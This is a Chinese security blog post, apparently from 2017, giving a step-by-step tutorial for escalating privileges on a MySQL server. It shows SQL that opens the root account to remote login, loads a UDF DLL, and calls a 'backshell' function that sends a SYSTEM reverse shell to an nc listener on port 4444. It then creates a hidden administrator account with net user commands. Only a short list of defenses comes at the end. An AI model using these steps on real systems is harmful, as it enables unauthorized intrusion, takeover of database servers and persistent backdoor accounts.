Mysql数据库反弹端口连接提权
simeon 漏洞分析 13105浏览 · 2017-03-02 17:51

Mysql数据库反弹端口连接提权
在渗透或者安全评估时,有可能遇到一些比较奇葩的环境,即使通过Mysql root账号和密码获取了webshell,由于无法执行命令,在一般的情况下,也就放弃了,但其实可以换一种思路,通过mysql查询来直接提权,可以针对以下场景:
(1)通过网站无法获取webshell
(2)Webshell无法执行命令
(3)有phpmyadmin和root账号,无法查询或者无法获取网站的真实路径
1.1反弹端口连接提权的条件
   1.访问Mysql数据库
获取了数据库root账号和密码或者相当于root权限的账号和密码,同时能够执行查询命令。换句话说可以通过phpmyadmin连接、通过网站后台的执行数据库命令或者“Navicat for MySQL”等客户端软件连接。
   2.可导出文件udf.dll到系统目录或者Mysql数据库安装目录下的lib下的plugin目录。如果有上传条件,可以直接上传udf.dll到对应目录。Mysql5.1以下版本到c:\winnt\system32或者c:\windows\system32目录,Mysql5.1以上版本到Mysql安装目录下的plugin 目录,例如D:\ComsenzEXP\MySQL\lib\plugin。
   3.授权mysql数据库远程用户登录
   可以修改host为%,更新权限,然后通过Navicat for MySQL连接数据库,直接打开命令提示窗口进行导出。
允许远程用户登录访问mysql的方法,需要手动增加可以远程访问数据库的用户。
方法一:本地登入mysql,更改 "mysql" 数据库里的 "user" 表里的 "host" 项,将"localhost"改为"%"
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES ;
方法二:直接授权
从任何主机上使用root用户,密码:youpassword(你的root密码)连接到mysql服务器:
GRANT ALL PRIVILEGES ON . TO 'root'@'%' IDENTIFIED BY 'youpassword' WITH GRANT OPTION;
FLUSH PRIVILEGES;
1.2具体实现方法
1.连接mysql服务器
(1)通过mysql客户端工具可以直接连接
(2)通过phpmyadmin进行连接
(3)通过mysql.exe直接连接
2.执行查询命令
(1)网上提供的“. c:\mysql.txt”命令会出错,最好通过phpmyadmin或者Navicat for MySQL等工具来进行查询。修改mysql.txt中的最后一行代码“select backshell("YourIP",4444);”为自己反弹的IP和反弹监听的端口。
(2)本地开启监听反弹的端口
nc.exe -vv -l -p  4444
(3)执行mysql查询,将mysql.txt文件内容复制到查询中执行。
成功后,你将获得一个system权限的cmdshell。
3.添加用户或者获取管理员密码
   通过反弹shell添加用户antian365,密码www.antian365.com
net user antian365 www.antian365.com /add
net localgroup administrators antian365
1.3一个提权实例
1.在反弹监听服务器上进行端口监听
通过cmd命令提示符,执行nc监听命令:nc –vv –l –p 4444,表示在本地监听4444端口。如果是在公网上,这反弹监听服务器必须有独立IP,如果是内部网络,则可以直接使用内网IP,如图1所示。

图1进行监听
2.修改mysql.txt文件中反弹地址
在mysql.txt文件中将最后一行代码修改为前面设置的监听IP地址和端口,如图2所示,例如代码:
select backshell("192.168.40.135",4444);//反弹监听服务器IP192.168.40.135,端口4444

图2修改查询代码中反弹shell地址和端口
这个也可以再次单独查询:select backshell("192.168.40.135",4444);
3.执行查询
可以通过mysql命令行下执行,也可以通过phpmyadmin查询窗口以及一些mysql客户端查询进行,如图3所示执行查询。

图3执行mysql查询
说明:
(1)如果已经存在ghost表和backshell函数,可以执行以下命令进行删除:
drop table ghost;
drop FUNCTION backshell;
(2)如果已经存在udf.dll,则可以跳过导出命令,执行:
CREATE FUNCTION backshell RETURNS STRING SONAME 'udf.dll';
3.查看反弹结果
如图4所示,显示通过连接mysql执行查询获取的终端反弹shell,在该shell下可以直接执行net user、whoami等命令查看当前权限。

图4查看反弹结果
1.4防范方法
1.查看mysql数据库中user表授权的登录host,禁止具备Root账号权限的用户通过“%”进行登录。
2.禁止在网站CMS系统使用root账号进行配置。
3.设置root账号的密码为强密码。
4.对Mysql执行程序进行降权,禁止网站用户读取user.frm、user.myd、user.myi。例如D:\ComsenzEXP\MySQL\data\mysql下的user表文件user.frm、user.myd、user.myi要禁止网站用户读取和下载。
5.检查mysql数据库下的mysql表中是否存在其它无关表,检查func表中的内容。
6.可以在相应的目录下建立一个udf.dll空文件,并严格设置权限,任何人无读取和写入权限。
文中提及的mysql.txt以及udf见附件。

附件:
9 条评论
某人
表情
可输入 255
目录